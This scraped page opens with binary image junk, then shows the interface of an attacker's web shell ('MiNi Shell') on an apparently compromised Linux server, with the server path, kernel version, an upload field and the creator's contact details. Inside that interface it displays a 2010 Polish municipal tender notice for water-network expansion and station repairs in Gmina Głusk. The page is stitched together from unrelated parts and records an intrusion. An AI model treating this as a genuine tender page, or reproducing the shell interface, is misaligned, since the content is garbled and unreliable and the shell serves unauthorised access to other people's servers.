JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100106/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100106/3990-N-2010.html

<p class="kh_header"><b>Lublin: PORZĄDKOWANIE GOSPODARKI WODNO - ŚCIEKOWEJ NA TERENIE GMINY GŁUSK ETAP I ROZBUDOWA I REMONT SIECI WODOCIĄGOWYCH</b><br>
<b>Numer ogłoszenia: 3990 - 2010; data zamieszczenia: 06.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Głusk , ul. Głuska 140, 20-380 Lublin, woj. lubelskie, tel. 081 7518760, faks 081 7518650.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glusk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PORZĄDKOWANIE GOSPODARKI WODNO - ŚCIEKOWEJ NA TERENIE GMINY GŁUSK ETAP I ROZBUDOWA I REMONT SIECI WODOCIĄGOWYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane związane z rozbudową sieci wodociągowej, remontem stacji wodociągowych, stanowiące I etap zadania mającego na celu uporządkowanie gospodarki wodno-ściekowej na terenie gminy i poprawę warunków życia mieszkańców. Zadanie podzielone zostało na dwa etapy: etap I to roboty związane z rozbudową i remontem sieci wodociągowych oraz etap II: roboty związane z budową kanalizacji sanitarnej. Zakres niniejszego postępowania obejmuje następujące roboty:
1) Rozbudowę sieci wodociągowej, wykonanie następujących odcinków sieci : 
- odcinek G z rur PCV o średnicy f150 mm, długości 1356 m, stanowiący połączenie wodociągów Wilczopole f100 (w punkcie 4w wcinka z trójnikiem f100/100 i zasuwą żeliwną f100) i Kalinówka f150 (w punkcie 31k wcinka z trójnikiem f150/150 i zasuwą żeliwną f150) na terenie miejscowości Kliny i Kazimierzówka; na wodociągu w połowie jego długości projektuje się zasuwę sekcyjną żeliwną f150;
- odcinek H z rur PCV o średnicy f 100 mm, długości 707 m, stanowiący połączenie wodociągów Kalinówka i Wilczopole na terenie miejscowości Wilczopole Wieś;
- odcinek K z rur PCV o średnicy f150 mm, długości 554 m, stanowiący połączenie wodociągów Kalinówka i Wilczopole na terenie miejscowości Wilczopole Kolonia;
- odcinek F z rur PCV o średnicy f160 mm, długości 168 m, łączący punkty 32k i 33k wodociągu Kalinówka ( w punkcie 32k zasuwa żeliwna f 100 i połączenie z zaślepionym końcem wodociągu PVC f110 );
- odcinek A-B z rur PCV f160, długości 963 m, stanowiący połączenie wodociągów Wilczopole PVC f110 ( w punkcie A wcinka z trójnikiem f100/100 i zasuwą żeliwną f150) i Czerniejów PVC f110 (w punkcie B wcinka z trójnikiem f100/100 i zasuwą żeliwną f150);  na wodociągu projektuje się studzienkę wodomierzową z układem pomiarowym złożonym z 2 wodomierzy sprzężonych i układu przepustnic.
Łączna długość projektowanej sieci wynosi ~3 750 m. Głębokość ułożenia przewodów wodociągowych będzie wynosić min. 1,75 m od dna rury do powierzchni terenu. Przejścia wodociągu pod drogami utwardzonymi należy wykonać przewiertami w rurach osłonowych stalowych. 
Zakres robót budowlanych związanych  z rozbudową sieci wodociągowej obejmuje: roboty ziemne w zakresie wykonania sieci wodociągowej, wykonanie przewiertów, budowę rurociągów i uzbrojenia sieci, próby i dezynfekcję sieci, czyszczenie sieci wodociągowej, zagospodarowanie placu budowy.
2) Wymianę zasuw sekcyjnych i opasek na przyłączach wodociągowych w miejscowościach Wilczopole, Wilczopole Kolonia i Kliny.
3) Remont stacji wodociągowej w Kalinówce
    a) roboty instalacyjne
     - montaż osuszacza powietrza
     - wymiana zaworu redukcyjnego
    b) roboty budowlane
    - ocieplenie ścian zewnętrznych styropianem gr. 10 cm 
    - wykonanie opaski z kostki brukowej 6 cm wokół budynku,
    - utwardzenie placu manewrowego o pow. ~270 m2 tłuczniem kamiennym z wykonaniem nawierzchni asfaltowej,
    - wymiana pokrycia dachowego z papy termozgrzewalnej z dociepleniem stropodachu wełną mineralną gr. 12 cm - powierzchnia dachu ~ 115 m2 ,
    - wymiana obróbek blacharskich, rynien i rur spustowych z blachy ocynkowanej,
    - stolarki okiennej i drzwi zewnętrznych.
4) Remont stacji wodociągowej w Wilczopolu Kolonii
    a) roboty instalacyjne - wymiana sprężarki
    b) roboty budowlane
    - ocieplenie ścian zewnętrznych styropianem gr. 10 cm,
    - utwardzenie placu manewrowego o łącznej pow. ~200 m2 tłuczniem kamiennym z wykonaniem nawierzchni asfaltowej,
   - pokrycie dachu dodatkową warstwą papy termozgrzewalnej z dociepleniem stropodachu styropianem gr. 10 cm - pow. dachu ~80 m2 , wymiana obróbek blacharskich,
    - wymiana stolarki okiennej,
    - wymiana ogrodzenia z siatki na długości ~ 163 m.
  5) Remont stacji wodociągowej w Klinach
    a) roboty instalacyjne - wymiana zestawu hydroforowego
    b) roboty budowlane
    - ocieplenie ścian zewnętrznych styropianem gr. 10 cm,
    - utwardzenie drogi dojazdowej do budynku i placu manewrowego o pow. ~300 m2 tłuczniem kamiennym z wykonaniem nawierzchni asfaltowej,
    - wymiana pokrycia dachu z dociepleniem stropu wełną mineralną gr. 12 cm - pow. 66 m2,
    - wymiana obróbek blacharskich z blachy ocynkowanej,
    - naprawa posadzki betonowej w pomieszczeniu technologicznym i ułożenie płytek gresowych na pow. ~ 25,0 m2
6) Wymianę złoża filtracyjnego na ujęciu wody Czerniejów 
7) Czyszczenie sieci wodociągowej w miejscowościach Głuszczyzna, Ćmiłów, Żabia Wola, Wólka Abramowicka, Dominów, obsługiwanych przez ujęcie Czerniejów. Sieć o średnicach od 100 do 200 mm czyszczona będzie hydropneumatycznie, dwuetapowo za pomocą przepływowego medium czyszczącego. Zakres prac obejmuje ~34 km sieci.
8) Komora redukcyjna na sieci wodociągowej Kalinówka
    Zaprojektowana na działce nr 329/1 przy ul. Sachsów w Lublinie, na sieci wodociągowej o średnicy 100 w bezpośrednim sąsiedztwie węzła 59K.
9) Zakup wyposażenia dla stacji wodociągowych : 
    - komputerowy zestaw inkasencki z oprogramowaniem  -  2 kpl
    - agregat prądotwórczy o mocy 60 kVA  ( Czerniejów) i o mocy 77 kVA   (Kalinówka) .      
Szczegółowy opis przedmiotu zamówienia wraz z warunkami technicznymi wykonania robót określony jest w projektach budowlanych oraz Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych stanowiącej załącznik do niniejszej specyfikacji. Projekty budowlane są udostępniane 
w siedzibie Zamawiającego , w budynku UG przy ul. Miodowej 1, pokój nr 2.
Zamawiający dopuszcza zmianę zakresu rzeczowego robót, polegającą na rezygnacji z budowy komory redukcyjnej przy ul. Sachsów w Lublinie, w przypadku potwierdzenia przez Urząd Miasta Lublin (jako organu współfinansującego tę część zadania) przejęcia zasilania w wodę dzielnicy Głusk 
i przebudowę odcinków istniejącej sieci wodociągowej w tym rejonie przez MPWiK.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.13.00-8, 45.23.21.00-3, 45.45.30.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Składający ofertę wnosi wadium w wysokości 40 000 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
6.1  Spełniają warunki określone w art.22 ust.1 pkt 1-3 oraz art. 26 ust. 2b ustawy:
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, zgodnie z wymaganiami ustawowymi;
-   posiadają niezbędną wiedzę i doświadczenie;
- dysponują potencjałem technicznym  i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych zasobów na okres wykonania zamówienia;
-   znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
6.2  Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust.2 ustawy
6.3  Są ubezpieczeni od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej oraz będą ubezpieczeni przez cały okres realizacji zamówienia.
6.4  Posiadają doświadczenie zawodowe wyrażające się zrealizowaniem w okresie ostatnich 5 latach co najmniej 2 zadań odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia.
6.5  Zaakceptują bez uwag postanowienia zawarte w SIWZ i załączonym projekcie umowy.
6.6  Udzielą gwarancji na 36 miesięcy i rękojmi na 60 miesięcy.
6.7  Do oferty załączą oświadczenia i dokumenty wymienione w pkt.7 SIWZ.
6.8  Wpłacą wadium zgodnie z postanowieniami pkt 9 SIWZ.
Ocena spełniania warunków wymaganych od wykonawców:
Zamawiający oceni spełnianie warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów załączonych do oferty, wyszczególnionych w pkt. 7. W toku badania i oceny ofert, 
Zamawiający będzie posługiwał się kryterium spełnia / nie spełnia.
Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści złożonych ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na podstawie rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. nr 226, poz. 1817) Wykonawcy winni przedłożyć niżej wymienione dokumenty.  
Dla potwierdzenia spełnienia warunków, o których mowa w art. 22 ust.1 ustawy i pkt 6.1, 6.3, 6.4 niniejszej specyfikacji należy złożyć : 
7.1  Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 i art. 26 ust. 2b ustawy - wzór oświadczenia stanowi załącznik nr 2 do SIWZ ;
7.2 Wykaz zatrudnionych osób, odpowiedzialnych za realizację zamówienia, w tym  kierownika budowy z uprawnieniami branżowymi, zgodnymi z przedmiotem zamówienia - wzór formularza stanowi załącznik nr 4;
7.3 Dokumenty potwierdzające posiadanie wymaganych kwalifikacji zawodowych do pełnienia samodzielnych funkcji technicznych w budownictwie osoby lub osób przewidzianych do kierowania robotami budowlanymi, będącymi przedmiotem  zamówienia - kserokopie uprawnień i zaświadczenia o przynależności do Izby Samorządu Zawodowego;
7.4 Wykaz niezbędnych do wykonania zamówienia jednostek sprzętowo-transportowych, jakimi dysponuje Wykonawca, na formularzu stanowiącym załącznik nr 5.
7.5 Wykaz robót wykonanych w okresie ostatnich 5 lat, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości, daty i miejsca wykonania ( według załącznika nr 6 ) wraz z referencjami lub innymi dokumentami potwierdzającymi należyte wykonanie tych robót;
7.6 Informację z banku, w którym Wykonawca posiada podstawowy rachunek bankowy, potwierdzającą wysokość posiadanych środków finansowych lub posiadania zdolności kredytowej odpowiedniej do wartości zadania;
7.7 Opłaconą polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia oraz spełnienia warunku określonego w pkt 6.2 SIWZ należy złożyć:
7.8 Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione lub potwierdzone nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ;  
7.9 Aktualną informację z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust.1 pkt 4 - 9 ustawy, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ;
7.10 Aktualne zaświadczenie z właściwego Urzędu Skarbowego, potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert ;
7.11 Aktualne zaświadczenie  właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert .
Dokumenty należy złożyć w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia kopie dokumentów są poświadczane za zgodność z oryginałem przez każdego z tych wykonawców..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.pl/glusk.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Głusk 20-385 Lublin ul. Miodowa 1 pok. Nr 2.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2010 godzina 10:00, miejsce: Urząd Gminy Głusk 20-385 Lublin ul. Głuska 140 Pok. Nr 1 (Sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com